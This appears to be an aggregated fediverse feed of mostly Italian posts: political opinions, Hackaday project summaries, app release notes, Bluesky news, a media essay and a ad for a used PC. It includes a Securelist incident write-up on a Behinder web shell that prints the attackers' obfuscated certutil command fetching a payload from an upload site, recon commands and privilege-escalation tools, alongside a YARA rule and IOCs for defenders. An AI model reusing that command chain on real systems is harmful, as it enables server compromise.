Salta al contenuto principale



Mi sto chiedendo cos'altro debba succedere perché capiamo che Trump è, nella migliore delle ipotesi, parte di un piano tutto suo e di Putin per soggiogare Ucraina ed Europa, e tante altre cose.

Nella peggiore delle ipotesi è proprio sul libro paga di Putin.

Per me è la seconda, mi sembra sempre più evidente.

Statunitensi, che vogliamo fare?

digiter doesn't like this.

in reply to Simon Perry

ma soprattutto... Europei e italiani: che vogliamo fare?



Phytoremediation to Clean the Environment and Mine Critical Materials


A balding man in a blue suit and tie sits behind rows of plants on tables. A bright yellow watering can is close to the camera and out of focus.

Nickel contamination can render soils infertile at levels that are currently impractical to treat. Researchers at UMass Amherst are looking at how plants can help these soils and source nickel for the growing EV market.

Phytoremediation is the use of plants that preferentially hyperaccumulate certain contaminants to clean the soil. When those contaminants are also critical materials, you get phytomining. Starting with Camelina sativa, the researchers are looking to enhance its preference for nickel accumulation with genes from the even more adept hyperaccumulator Odontarrhena to have a quick-growing plant that can be a nickel feedstock as well as produce seeds containing oil for biofuels.

Despite being able to be up to 3% Ni by weight, Odontarrhena was ruled out as a candidate itself due to its slow-growing nature and that it is invasive to the United States. The researchers are also looking into what soil amendments can best help this super Camelina sativa best achieve its goals. It’s no panacea for expected nickel demand, but they do project that phytomining could provide 20-30% of our nickel needs for 50 years, at which point the land could be turned back over to other uses.

Recycling things already in technical cycles will be important to a circular economy, but being able to remove contaminants from the environment’s biological cycles and place them into a safer technical cycle instead of just burying them will be a big benefit as well. If you want learn about a more notorious heavy metal, checkout our piece on the blessings and destruction wrought by lead.

youtube.com/embed/zYB-DlEtFdE?…


hackaday.com/2025/02/28/phytor…



@RaccoonForFriendica version 0.4.1 has been finally released! I was waiting to fix a couple of old issues but I realized I was keeping people waiting too much since almost 2 months had passed since the previous stable version.

If you were on the latest beta, the only new feature is the possibility to see in every timeline the "source platform" each post is coming from (Friendica, Mastodon, Lemmy, Misskey/Sharkey, Pleroma/Akkoma, Kbin/Mbin, WordPress, GNU Social, Pixelfed, Peertube, GoToSocial, Diaspora, generic ActivityPub and more are coming).

If you were using 0.4.0 there are a ton of improvements, the most important of which are:

  • feat: add per-user rate limits;
  • feat: suggest hashtags while typing;
  • feat: swipe navigation between posts;
  • feat: exclude stop words from timelines;
  • feat: add shortcuts to other instances ("guest mode");
  • feat: open post detail as thread;
  • feat: post translation;
  • feat: followed hashtag indication;
  • feat: show source protocol for posts;
  • enhancement: support for embedded images.

This version is also available in the production track on Google Play, so you don't have to participate in the beta program any more to get it.

Let me know what you think about it, enjoy your weekend and as always #livefasteattrash

#friendica #friendicadev #androidapp #androiddev #fediverseapp #raccoonforfriendica #kotlin #multiplatform #kmp #compose #cmp #opensource #foss #procyonproject

in reply to Jonas ✅

Ok seen it. It is due to encrypted shared preferences (used to store on device your auth token). It fails to open after you restore the app, probably due to failure to decrypt them because the key changes when you reinstall it. I'll investigate more to see if there are workarounds.

Seemingly it is a known issue.

RaccoonForFriendica reshared this.



Building an Interferometer With Lego


Lego! It’s a fun toy that is popular around the world. What you may not realize is that it’s also made to incredibly high standards. As it turns out, the humble building blocks are good enough to build a interferometer if you’re so inclined to want one. [Kyra Cole] shows us how it’s done.

The build in question is a Michelson interferometer; [Kyra] was inspired to build it based on earlier work by the myphotonics project. She was able to assemble holders for mirrors and a laser, as well as a mount for a beamsplitter, and then put it all together on a Lego baseboard. While some non-Lego rubber bands were used in some areas, ultimately, adjustment was performed with Lego Technic gears.

Not only was the Lego interferometer able to generate a proper interference pattern, [Kyra] then went one step further. A Raspberry Pi was rigged up with a camera and some code to analyze the interference patterns automatically.

[Kyra] notes that using genuine Lego bricks was key to her success. Their high level of dimensional accuracy made it much easier to achieve her end goal. Sloppily-built knock-off bricks may have made the build much more frustrating to complete.

We don’t feature a ton of interferometer hacks around these parts. However, if you’re a big physics head, you might enjoy our 2021 article on the LIGO observatory. If you’re cooking up your own physics experiments at home, don’t hesitate to drop us a line!

[Thanks to Peter Quinn for the tip!]


hackaday.com/2025/02/28/buildi…




DRM and big tech's war on ownership has led me to make my own media libraries, and you should too.

DRM and big techx27;s war on ownership has led me to make my own media libraries, and you should too.#Streaming #DataHoarding



The SOC files: Chasing the web shell


Web shells have evolved far beyond their original purpose of basic remote command execution, and many now function more like lightweight exploitation frameworks. These tools often include features such as in-memory module execution and encrypted command-and-control (C2) communication, giving attackers flexibility while minimizing their footprint.

This article walks through a SOC investigation where efficient surface-level analysis led to the identification of a web shell associated with a well-known toolset commonly associated with Chinese-speaking threat actors. Despite being a much-discussed tool, it is still used by the attackers for post-exploitation activities, thanks to its modular design and adaptability. We’ll break down the investigative process, detail how the analysts uncovered the web shell family, and highlight practical detection strategies to help defenders identify similar threats.

Onset


It’s early Monday morning, almost 4am UTC time, and the apparent nighttime calm inside the SOC is abruptly interrupted by an alert from our SIEM. It indicates that Kaspersky Endpoint Security’s heuristic engine has detected a web shell (HEUR:Backdoor.MSIL.WebShell.gen) on the SharePoint server of a government infrastructure in Southeast Asia, a warning that no SOC analyst would want to ignore.
C:\Windows\System32\inetsrv\w3wp.exe -ap "SharePoint" [...]
└── "cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il -u""""r""""l""""c""""a""""c""""h""""e"""" -split -f hxxps://bashupload[.]com/[REDACTED]/404.aspx 404.aspx
└── C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\[REDACTED]\[REDACTED]\App_Web_404.aspx.[REDACTED].[REDACTED].dll
The night shift team springs into action, knowing that the web shell could be the beginning of much worse activity, and that every second counts. Initial analysis of the telemetry suggests that the attackers exploited the affected web server, either by taking advantage of another web shell or a command injection vulnerability.

From the listing above, where the process tree that triggered the first detection is reported, it is possible to observe an attempt to deploy a web shell disguised as a 404 page. The certutil utility was used to download the ASPX payload, which was hosted by abusing Bashupload. This web service, which is used to upload files from the command line and allows one-time downloads of samples, is no stranger to being abused as an ingress tool transfer technique.

As is common practice, the command has been slightly obfuscated by using escape characters (such as ^ and “) to break up the keywords “certutil” and “urlcache” in order to bypass basic detection rules based on simple pattern matching.
As part of our MDR service, we are required to operate within pre-established boundaries that are tailored to the customer’s business continuity needs and risk tolerance. In this case, the customer retains ownership of decisions regarding sensitive assets, including the isolation of compromised hosts, so we can’t instantly block the attack and must continue to observe and perform a preliminary threat analysis.

A manual reconnaissance and discovery activity by an operator starts appearing, and despite the tension, an occasional typo (“localgorup”) manages to draw a smile:
whoami
net user
query user
net localgorup administrators
net localgroup administrators
whoami /all
"cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il[...]

Aftermath


To gain system privileges, the threat actors used several variants of the well-known Potato tools, either as memory-only modules or as standalone executables:
Paths:
C:\ProgramData\DRM\god.exe
C:\Users\Default\Videos\god.exe
MD5: 0xEF153E1E216C80BE3FDD520DD92526F4
Description: GodPotato

Process: C:\Windows\System32\inetsrv\w3wp.exe
MD5 (memory region): 0xB8A468615E0B0072D2F32E44A7C9A62F
Description: BadPotato
Original filename: BadPotato.dll
MD5 (memory region): 0xB5755BE4AAD8D8FE1BD0E6AC5728067B
Description: SweetPotato
Original filename: SweetPotato.dll
To bring standalone binaries into the environment, the attackers again used the Bashupload free web service, which we saw in the initial web shell alert. Of all the tools, the GodPotato standalone binary ultimately succeeded in gaining system privileges.

With elevated access, the attackers moved on to domain trust enumeration, mapping relationships between domains and identifying potential targets for lateral movement. But let’s get back to the main question: What kind of web shell are we dealing with here?

Identifying the threat


Unfortunately, we were unable to retrieve the web shell sample used during the initial access phase. However, starting with the privilege escalation phase, several .NET modules began to appear in the memory of the IIS worker process (
w3wp.exe), ranging from popular tools like Potato to other lesser known ones. One set of libraries in particular caught our attention, so we decided to investigate further by performing a manual inspection.
Fortunately, the libraries were not obfuscated and lent themselves to quick static analysis:

Example of a library detected in IIS process memory (0x0B593115C273A90886864AF7D4973EED)
Example of a library detected in IIS process memory (0x0B593115C273A90886864AF7D4973EED)

In the image above, if you look at the orange method names in the Assembly Explorer on the left, you can observe some peculiarities that can be used to identify similar samples. Although many of the methods names are very generic, there is one that is quite unique,
EnjsonAndCrypt. A quick Google search of this name yields no results, which means it may be sample-specific.
The
getExtraData method is also interesting: although it has a non-specific name, there is a sequence of bytes [126, 126, 126, 126, 126, 126] that is used to parse key:value pairs whose value is base64 encoded:

The “extraData” structure example

Threat actors need to use the same byte sequence if they want to maintain backward compatibility across different implant versions, but since it is also very generic, we should combine both indicators, the getExtraData name and this byte array, to define a sufficiently precise detection condition that can be used in conjunction with EnjsonAndCrypt to create a detection rule.

Uncovering modules and variants


By feeding our newly created YARA rule to a multi-AV platform such as VirusTotal, we can identify additional samples that differ from those observed in the targeted infrastructure. It is worth noting that some of these have a poor detection rate:

Poorly detected BasicInfo.dll (32865229279DE31D08166F7F24226843) sample
Poorly detected BasicInfo.dll (32865229279DE31D08166F7F24226843) sample

Below are the most common names of libraries that match the rule:
BShell.dll
BasicInfo.dll
Cmd.dll
Database.dll
Echo.dll
Eval.dll
FileOperation.dll
Hs.dll
LoadNativeLibrary.dll
Loader.dll
Plugin.dll
PortMap.dll
RealCMD.dll
RemoteSocksProxy.dll
ReversePortMap.dll
SocksProxy.dll
Transfer.dll
Utils.dll
Module filenames

Those familiar with the toolkit used may have already identified it by looking at these filenames, but if not, it is also possible to infer the relationship by simply pivoting to the samples available on VT:

Sample FC793D722738C7FCDFE8DED66C96495B relations on VT
Sample FC793D722738C7FCDFE8DED66C96495B relations on VT

Behinder, also known as Rebeyond, Ice Scorpion, 冰蝎 (Bīng xiē), is known as a cross-platform web shell designed to be compatible with most popular web servers running PHP, Java or ASP.NET as in our investigation. Although the web shell sample itself is very lightweight and somewhat basic, the tool includes a powerful GUI for operators with numerous capabilities including loading additional modules and giving them full control over compromised environments.

Its built-in AES-encrypted communication allows threat actors to maintain stealthy control over a compromised web server, often bypassing traditional network detection mechanisms, and its modular, flexible nature allows malicious actors to use it as a base for customization even though it is only available as a pre-built tool on GitHub. Moreover, the presence of several step-by-step Chinese language tutorials on CSDN (Chinese Software Developer Network) makes it widely accessible to opportunistic bad actors.

The bigger picture


Taking a step back, the relationship between the memory artifacts observed on the customer’s server during the post-exploitation phase and the web shell source code becomes evident. The web shell is not just a foothold, it’s a fully functional backdoor that facilitates encrypted communication with the operators’ infrastructure, allowing them to call built-in or custom-loaded libraries, deploy additional tools, conduct reconnaissance and exfiltrate data while remaining hidden:

ASPX web shell side by side with .NET payload
ASPX web shell side by side with .NET payload

Although the Behinder web shell has been widely discussed in the past, especially the PHP and JSP variants, it is still a current and evolving cyberweapon. Even if attackers make mistakes or act carelessly by reusing the same encryption keys or exhibiting the same patterns, we can’t afford to let our guard down. In the incident described in this article, if we had not taken the time to dig deeper into the artifacts observed in memory, we likely would have missed the toolkit altogether.

Threats evolve quickly, and signature-based malware detection only catches what we already know. Underestimating the potential of memory-based payloads can lead to a false sense of security. Teams may assume that if they haven’t detected any suspicious files, they are safe, when in fact threats may be actively operating in memory.

For SOC teams, continuous learning, proactive threat hunting, and refining detection techniques are essential to staying ahead of adversaries.

Happy hunting and see you on the next mission!

YARA rule

rule dotnetFrozenPayload
{
strings:
$CorDllMain_mscoree_dll = {00 5F 43 6F 72 44 6C 6C 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00}
$EnjsonAndCrypt = {00 45 6E 6A 73 6F 6E 41 6E 64 43 72 79 70 74 00}
$getExtraData = {00 67 65 74 45 78 74 72 61 44 61 74 61 00}
$extraDataMagicArray = {00 7E 7E 7E 7E 7E 7E 00} //0x00, byte[] {126, ...,}, 0x00
condition:
uint16(0) == 0x5A4D and
filesize < 400000 and
$CorDllMain_mscoree_dll and
(
$EnjsonAndCrypt or
(
$getExtraData and $extraDataMagicArray
)
)
}

Indicators of compromise


Payloads
EF153E1E216C80BE3FDD520DD92526F4 god.exe
B8A468615E0B0072D2F32E44A7C9A62F BadPotato.dll
B5755BE4AAD8D8FE1BD0E6AC5728067B SweetPotato.dll
578A303D8A858C3265DE429DB9F17695 BasicInfo.dll
EA19D6845B6FC02566468FF5F838BFF1 FileOperation.dll
CD56A5A7835B71DF463EC416259E6F8F Cmd.dll
5EA7F17E75D43474B9DFCD067FF85216 Echo.dll

File paths

C:\ProgramData\DRM\
C:\Users\Default\Videos\


securelist.com/soc-files-web-s…



A Different Take on the River Table Does it in Bronze


A dark walnut table sits in the sun in what appears to be a field. Voids in the natural wood slab have been filled with shiny bronze, and a bundle of copper wire sits upon the edge of the table in a jaunty artistic fashion.

River tables are something we’ve heard decried as a passé, but we’re still seeing some interesting variations on the technique. Take this example done with bronze instead of epoxy.

Starting with two beautiful slabs of walnut, [Burls Art] decided that instead of cutting them up to make guitars he would turn his attention to a river table to keep them more intact. Given the price of copper and difficulty in casting it, he decided to trim the live edges to make a more narrow “river” to work with for the project.

Since molten copper is quite toasty and wood likes to catch on fire, he wisely did a rough finish of the table before making silicone plugs of the voids instead of pouring metal directly. The silicone plugs were then used to make sand casting molds, and a series of casting trials moving from copper to bronze finally yielded usable pieces for the table. In case that all seems too simple, there were then several days of milling and sanding to get the bronze and walnut level and smooth with each other. The amount of attention to detail and plain old elbow grease in this project is impressive.

We’ve seen some other interesting mix-ups of the live edge and epoxy formula like a seascape night light or this river table with embedded neon. And if you’re looking to get into casting, why not start small in the microwave?

youtube.com/embed/slu4A4L0bqo?…


hackaday.com/2025/02/28/a-diff…



Cheap Fiber Optic Wand Toy Becomes Tiny Weird Display


If you’ve ever seen those cheap LED fiber optic wands at the dollar store, you’ve probably just thought of them as a simple novelty. However, as [Ancient] shows us, you can turn them into a surprisingly nifty little display if you’re so inclined.

The build starts by removing the fiber optic bundle from the wand. One end is left as a round bundle. At the other end, the strands are then fed into plastic frames to separate them out individually. After plenty of tedious sorting, the fibers are glued in place in a larger rectangular 3D-printed frame, which holds the fibers in place over a matrix of LEDs. The individual LEDs of the matrix light individual fibers, which carry the light to the round end of the bundle. The result is a tiny little round display driven by a much larger one at the other end.

[Ancient] had hoped to use the set up for a volumetric display build, but found it too fragile to be fit for purpose. Still, it’s interesting to look at nonetheless, and a good demonstration of how fiber optics work in practice. As this display shows, you can have two glass fibers carrying completely different wavelengths of light right next to each other without issue.

We’ve featured some other great fiber optic hacks over the years, like this guide on making your own fiber couplings. Video after the break.

youtube.com/embed/zz59e1wWyVc?…

[Thanks to Zane and Darryl and Ash for the tip! This one was all over the tipsline!]


hackaday.com/2025/02/28/cheap-…

Different Than reshared this.



📣 Dal 12 al 14 marzo 2025 si svolgerà l’ottava edizione di Didacta Italia a Firenze, presso la Fortezza da Basso! Il #MIM sarà presente all’importante appuntamento dedicato alla formazione e all’innovazione scolastica con oltre 130 eventi, organizzat…
#MIM



Ieri il Ministro Giuseppe Valditara si è recato nelle Marche per una visita istituzionale in alcune scuole del territorio e per incontrare studenti, docenti e amministratori locali.

Qui tutti i dettagli ➡️ mim.gov.



Welcome to the bi-weekly tech-focused update on everything that is happening on Bluesky and the wider ATmosphere. The theme continues to be: “can ATProto scale down“? Next week will be focused again on Bluesky and it’s surrounding ecosystem of media apps. The News Constellation is a project that recently released that provides a database of […]


Last Week in the ATmosphere – 2025feb.d

Welcome to the bi-weekly tech-focused update on everything that is happening on Bluesky and the wider ATmosphere. The theme continues to be: “can ATProto scale down“? Next week will be focused again on Bluesky and it’s surrounding ecosystem of media apps.

The News


Constellation is a project that recently released that provides a database of all backlinks in the entire network. Constellation now has a database of over 1.2 billion links, and an accompanying website with statistics to slice through. The Constellation API is now also getting integrated into multiple PDS browsers, both PDSls and atp.tools show backlinks to the ATProto records now. This puts PDS browsers more into their own specific place on the network: not a full AppView, but more than just a way to view the content of a PDS.

Bluesky PBC has put out a new proposal for ATProto, Sync 1.1. The proposed update concerns the relays, and the validation work they do. As part of the Authenticated Transfer, which ATProto is named after, relays validate every event on the firehose. This validation process currently requires a relay to store the entire repo, which can take up a lot of space. This is one of the aspects that make hosting a relay more expensive. The proposed update changes the way validation works, which allows a relay to validate the integrity of all the data going through the firehose without having to store the entire repo. Bluesky engineer Devin Ivy provides an explainer thread on how this works here. This update makes it much more feasible for people to self-host relays.

Another proposal by Bluesky PBC is for moderation routing report. The new feature allows labelers to select which type of report they want to receive. A common problem that labelers currently face is that users tend to receive reports that are not relevant for their specific labeling service, which causes them unnecessary extra work, as well as getting unnecessarily exposed to awful content. The new proposed update allows labelers to opt-out of specific reporting categories. Bluesky engineer Bryan Newbold says Bluesky PBC is currently working on implementing the feature, aiming to ship it soon.

In Other News


Bluesky has posted some new job vacancies, and they are now hiring a System Integrity Engineer, Product Designer and Senior Trust and Safety Lead. Both the System Integrity Engineer and Trust and Safety Lead indicate that Bluesky is expanding their Trust and Safety work: both of these jobs are newly created positions, with the engineering position explicitly focused on moderation systems and regulatory compliance.

Some podcasting news: two podcasting apps, Transistor and TrueFans, both added support for displaying Bluesky comments on the podcast episode page. TrueFans also supports fediverse comments, so that a podcast episode page can display comments and reactions from both networks.

Bluesky engineer Jaz wrote an article about ‘lossy’ timelines. The summary is that to maintain performance, the home timelines of accounts that follow more than 4k accounts will not always see all posts on the timeline.

Upcoming ATProto short-form video platform Spark shared their outline on some of the limits they’ll set. Spark aims to allow videos of 300 MB or 3 minutes long (compared to Bluesky’s 50MB or 1 minute), and 12 files for image posts (5MB each). This is part of the reason why Spark is not using Bluesky’s lexicon, instead developing their own. Setting these limits higher will also require Sparks to provide their own PDSes, as the file size limit is set by the Bluesky PDS. Hosting video is expensive, and it is not yet clear how Spark will finance this.

A short tutorial on how to publish lexicon verification. The first verified lexicons are now starting to show up on lexidex.

Roomy has posted a deep dive on their tech stack, how they are combining ATProto and Automerge to build public chatrooms.

Web browser Opera adds Bluesky integration, allowing you to more easily doom scroll in the sidebar of the browser.

Bluesky video client Skylight is now available in beta on Android, after Skylight had trouble with Google to get the Android beta approved.

Some events: Feed builder Graze will hold a meetup in New York this Friday the 28th, and at SXSW (March 10th, Austin) there will be Bluesky meetup.

The Links


  • An interview with Game Industry Labeler developer Trazy on how builds a community of thousands of game devopers on Bluesky.
  • A guide (in Japanese) on how to upload videos using Bluesky API (XRPC)
  • An interview with Bluesky CEO Jay Graber at Knight Media Forum.
  • A podcast interview with the developer of the ATProto art platform Pinksea

That’s all for this week, thanks for reading! If you want more analysis, you can subscribe to my newsletter. Every week you get an update with all the articles of this week, as well as extra analysis not published anywhere else. You can subscribe below, and follow this blog @fediversereport.com and my personal account @laurenshof.online on Bluesky.

#bluesky

fediversereport.com/last-week-…




questo non è il presidente degli stati uniti... lo hanno sostituito. ma che è? lui e i suoi compagni di asilo?

reshared this



Il 28 febbraio 2017 ci lasciava Leone di Lernia.

Ricordo quella mattina di ottobre del 1998 a Milano, all'altezza di viale Bligny, quando io e il Pierre fermi al semaforo, veniamo avvicinati da un'auto con sopra Leone e due giovani ragazze. Guarda il nostro cabriolet bianco, con la capote aperta, si alza in piedi e dice:"Permettete che ci piscio dentro?"

Magari un'altra volta.

"Trenta chili" Leone di Lernia e il Complesso l'Universo (1968)



chissà come mai zelensky ce l'ha così tanto con putin... neppure lo avesse invaso... ha fatto solo un'operazione speciale. per trump invece non era neppure una questione di pace tra ucraina e russia, ma solo affari. le famose "terre rare". qualcuno dica a trump che l'ucraina ha si minerali di valore ma non terre rare. e comunque non così tante come pensa lui. se non fosse così tragica ci sarebbe da ridere sia di trump che di putin. i grandi perculatori. il secondo convinto di essere stato aggredito dalla nato, il primo interessato ad affari con un popolo martoriato. ucraina come fascia di gaza a quanto pare. e pensare che prima dell'invasione ucraina la nato era data per finita... un retaggio del passato. poi creduta rinata, almeno da un paio di paesi confinanti con la russia. e con trump di nuovo morta. tutto cambia. eternamente. se la nato non esiste più, possiamo tornare tutti a casa, grande putin? e ognuno a sfondarsi di spese militari per il prossimo futuro e fregandosene del cambiamenti climatico... questi sono i saggi leader dell'epoca moderrna? quelli "concreti"? se non altro sia putin che trump amano il petrolio. chissà se ci fanno pure bagni di salute dentro. altro che inseguire orsi: le paludi di petrolio. c'è la lotta nel fango, e c'è la lotta nel petrolio.


(Stuart Kauffman "Reinventare il sacro" Codice Edizioni)

Qui sulla Terra, una buona metà di noi crede in un Dio creatore. Qualche altro miliardo crede in un Dio abramitico soprannaturale, e alcuni altri negli antichi dei indù. Tradizioni di saggezza, come il buddismo, sono spesso senza Dio. Circa un miliardo di persone è laico, ma privo di spiritualità e semplice consumatore materialista in una società laica. Se c'è qualcosa a cui noi laici teniamo è l'umanesimo. Ma l'umanesimo, in un'accezione ristretta, è troppo esile per nutrirci come agenti umani nel vasto universo che in parte co-creiamo. Abbiamo bisogno, credo, di un dominio per la nostra vita, ampio come la realtà. Se la metà di noi crede in un Dio soprannaturale, la scienza non confuterà quella fede. Abbiamo bisogno di un luogo per la nostra spiritualità, e un Dio creatore è uno di quei luoghi. Siamo noi, sostengo, ad aver inventato Dio, il più potente dei nostri simboli. E' una nostra scelta la saggezza con cui usare il nostro simbolo per orientare la nostra vita e la nostra civiltà. Credo che possiamo reinventare il sacro. Possiamo inventare un'etica globale in uno spazio condiviso, uno spazio sicuro per noi tutti, dove Dio va inteso come creatività naturale nell'universo.



questa cosa non ha alcun senso...
considerando che il costo di una polizza si bassa sulla statistica di quanto costa un evento per l'assicurato e quale sia la probabilità che un evento generico si realizzi, in uno specifico arco di tempo.
ora sappiamo che l'incidenza di questo tipo di eventi, diventato "frequente" negli ultimi anni, e pure destinato a salire nell'arco dei prossimi anni, facciamo qualche calcolo

opzione 1) un'assicurazione che mettiamo debba "contabilizzare il rischio" di dover rimborsare il 25% degli assicurati entro i prossimi 2-3 anni, dovrò far pagare un premio che è l'ammontare dei danni programmati per i prossimi anni + un guadagno. e in questo caso il costo dell'assicurazione sarà molto salato per le imprese. alcune potrebbero dover chiudere per l'impossibilità di pagare. quale azienda può assumersi il rischio statistico di perdere l'intera struttura ogni 2-3 anni?

opzione 2) il rischio è così elevato che nessuna assicurazione accetterà di stipulare polizze del genere, perché anti-economiche. perché eventi di questo genere sono diventati la norma e non più l'eccezione.

per capire il problema basti pensare al fatto che sono già sparite le polizze di protezione cristalli sulle auto, a causo della maggior incidenza statistica di questo genere di danno.

opzione 3) magari per legge le aziende assicurative saranno costrette a offrire le polizze a prezzi fattibili, e in questo caso alla prima calamità assisteremo al fallimento dell'assicurazione e quindi a nessun pagamento...

il fatto che secondo l'ottica di qualcuno le assicurazioni sono ladre ed hanno tanti soldi, non significa che offrire una garanzia del genere sia comunque fattibile, di fronte al futuro che ci attende poi. e neppure pare che il mondo voglia davvero preoccuparsi dei cambiamenti climatici... ditelo a cina, brasile, india, usa e urss....

a chiunque scaricherai la patata bollente alla fine, non sarà in grado di pagare. che sia l'azienda, un'assicurazione, o lo stato. e detti questi 3 non mi viene in mente nessun altro che possa pagare.



Da Londra a Bruxelles, la settimana della verità per la difesa europea

@Notizie dall'Italia e dal mondo

Occhi puntati su Londra questa domenica per il vertice sulla Difesa europea indetto dal primo ministro britannico, Keir Starmer, al rientro dal suo incontro con Donald Trump alla Casa Bianca. Invitati a partecipare non solo istituzioni e Paesi membri dell’Ue, ma anche Norvegia, Turchia e vertici



La giusta distanza.


noblogo.org/transit/la-giusta-…


La giusta distanza


(164)

(LGD)

Nel suo film del 2007 “La giusta distanza”, Carlo Mazzacurati narra la vicenda di un giovane apprendista giornalista, che non riesce, in merito ad un fatto di cronaca, a mantenere la “giusta distanza” dai fatti, come gli ha suggerito il suo mentore. Ovvero non riesce ad approfondire abbastanza quel che accade per averne una visione imparziale, il più possibile corretta e scevra da opinioni ed idee personali: quello che, nella teoria, ogni giornalista dovrebbe tendere a fare nel suo mestiere.

In Italia può essere portato ad esempio di come questo modo di operare sia, nei fatti, ignorato del tutto o quasi. Da parte di molte testate giornalistiche e di TG d'ogni canale è è un muoversi nelle direzioni più disparate: dapprima per rimanere “sul pezzo” e, passata la fase di picco a livello di notizia, per estendere all'infinito una serie di tematiche, perlopiù allarmiste e con un alto tasso di sensazionalismo, fino a coprire intere giornate di trasmissione.

E' anche un po' il limite, per esempio, dei canali “All News”, dove per ventiquattro ore al giorno si trasmette ogni sorta di dettaglio, di accadimento, di vocio per coprire la giornata intera. Reiterando all'infinito le stesse cose (non può accadere qualcosa di clamoroso ogni ora), si finisce con il “caricare” la notizia fino allo spasimo, spesso inserendo note di colore che rendono la narrazione volutamente altisonante, pervasiva, angosciante. Una estremizzazione indotta per mantenere attento lo spettatore.

(LGD2)

Chiaramente è una maniera d'operare affatto corretta e per quanto giornalisti ed opinionisti lo neghino, appare abbastanza chiaro che è un mare in cui a loro piace nuotare. Possiamo comprendere che sia più semplice fare così che mantenere quella distanza di cui sopra: si rischia, magari, la noia o una maniera troppo blanda di porgere le notizie e molte persone amano, inconsciamente o meno, il clamore e la chiacchiera, a discapito di coloro che, invece, vorrebbero leggere o sentire semplicemente ciò che è successo, senza fronzoli.

D'altro canto ognuno può essere un amplificatore dei fatti: basta un account su “Facebook” o su “X” dove riprendere e commentare ogni cosa venga detta, magari distorcendo ulteriormente le cose, caricandole con opinioni personali (cui si ha diritto) e facendo rimbalzare tutto ovunque. Una sorta di cerchio infinito in cui la sconfitta è l'informazione di qualità, quella cui dovrebbero sempre ambire tutti. Sarebbe un freno per un mondo già sovraccarico di input, dove siamo “bombardati” senza sosta, senza tregua di cose che ci sentiamo obbligati a seguire.

Un corto circuito permanente d'attenzione e di sovraccarico mediatico. E come ogni cosa portata all'eccesso, è un danno. Cui, temo, non si possa più porre rimedio, se non con la volontà personale di distaccarsi da questa narrazione sbilanciata, reinserendo nel proprio modo di informarsi una quanto mai necessaria dose di distacco e di ragionamento. Cose difficili da fare, faticose, ma non impossibili.

#Blog #Opinioni #Media #News #Informazione

Mastodon: @alda7069@mastodon.unoTelegram: t.me/transitblogFriendica: @danmatt@poliverso.orgBio Site (tutto in un posto solo, diamine): bio.site/danielemattioli

Gli scritti sono tutelati da “Creative Commons” (qui)

Tutte le opinioni qui riportate sono da considerarsi personali. Per eventuali problemi riscontrati con i testi, si prega di scrivere a: corubomatt@gmail.com




GRECIA: sciopero generale e manifestazioni oceaniche contro il governo


@Notizie dall'Italia e dal mondo
Enormi manifestazioni in Grecia nel giorno dello sciopero generale proclamato contro il governo, accusato di aver insabbiato le indagini contro i responsabili del disastro ferroviario di Tempes
L'articolo GRECIA: sciopero generale e manifestazioni oceaniche contro



Quale futuro per la Us Navy. Le sfide tra cantieristica e Cina nell’era Trump

@Notizie dall'Italia e dal mondo

Durante l’audizione di conferma davanti alla Commissione per i servizi armati del Senato Usa, John Phelan, indicato da Donald Trump come prossimo segretario alla Marina (SecNav), ha esposto quelle che saranno le sue priorità come nuovo capo della US Navy e del Corpo dei Marine. Ridurre i



Ddl Spazio, Pandolfo (Pd): “Nessuna crociata anti-Musk e Starlink. Ma non possiamo affidarci a un monopolista”


@Politica interna, europea e internazionale
Nessun inciucio tra Partito Democratico e Fratelli d’Italia e nessuna crociata contro Elon Musk né tantomeno pregiudizi verso il servizio Starlink di SpaceX ma solo un’attenzione alla salvaguardia della sicurezza nazionale e della capacità



I femminismi di fronte alla cultura woke

@Politica interna, europea e internazionale

8 marzo 2025, dalle ore 10:00 alle ore 18:00 presso l’Aula Malagodi della Fondazione Luigi Einaudi Introduce Lucetta Scaraffia Contro la strumentalizzazione del diritto, di Silvia Niccolai Maternità fra parto, aborto e gravidanza per altri, di Adriana Cavarero Le difficili alleanze tra i femminismi contemporanei, di Olivia




A court document reviewed by 404 Media says Cameron John Wagenius also searched for “U.S. military personnel defecting to Russia.”#News
#News


Intervista Katana Koala Kiwi


A volte, purtroppo sempre più raramente, arriva un gruppo o un solista che butta giù il vetro della vetrina nella quale viene esposta la musica di questi tempi, e ne nasce qualcosa di dirompente e fresco. Questo è il caso dei triestini Katana Koala Kiwi, che con il loro ep di debutto "Per farmi coraggio mi sono buttato dal piano terra" mettono assieme Post-Rock, Shoegaze, Emo e Post-Punk in una formula assai energica, qualcosa di molto fresco e decisamente piacevole. Grazie a Morgana di Conza abbiamo fatto due chiacchiere con loro, e le loro risposte sono come la loro musica. #iyezine #inyoureyesezine #iyezine.com #intervista #katanakoalakiwi @ka.ko_ki @conza.press @believemusicitalia #KatanaKoalaKiwi
#PostRock
#Shoegaze
#Emo
#PostPunk
#MusicaIndipendente
#NuovaMusica
#BandTriestina
#IntervistaMusicale
#EPDebutto
#PerFarmiCoraggioMiSonoButtatoDalPianoTerra
#SoundFresh
#CulturaMusicale
#PowerTrio iyezine.com/intervista-katana-…

Misc Cyborg reshared this.



Swedbank rifiuta la trasparenza nel calcolo automatico degli interessi La banca svedese Swedbank sostiene falsamente che la logica alla base del calcolo automatico dei tassi di interesse è un "segreto commerciale" mickey27 February 2025


noyb.eu/it/swedbank-refuses-tr…




HP Compaq 8200 Elite - i5-2500, 4GB RAM ⚠️DA RIPARARE⚠️ - Questo è un post automatico da FediMercatino.it

Prezzo: 0 $

Regalo computer HP Compaq 8200 Elite Convertible Minitower.

Il PC ha qualche problema, si avvia regolarmente ma ho riscontrato i seguenti problemi:

  • La ventola dell'alimentatore è rumorosa
  • Alcuni slot della RAM a volte danno errore

Caratteristiche

  • Modello: HP Compaq 8200 Elite Convertible Minitower
  • CPU: Intel Core i5-2500 @ 3,30 GHz
  • RAM: 4 GB DDR4
  • Hard disk: NON PRESENTE
  • Porte frontali: 4 x USB 2.0, 1 x cuffie, 1 x microfono
  • Porte posteriori: 6 x USB 2.0, 2 x Display Port, 1 x VGA, 2 x PS/2 (mouse/tastiera), 1 x seriale RS-232, 1 x Ethernet RJ45
  • Scheda video integrata Intel HD Graphics 2000

Il computer viene regalato, sono disposto anche a spedirlo, con spedizioni a carico dell'acquirente. Possibile ritiro a mano in zona Bergamo.

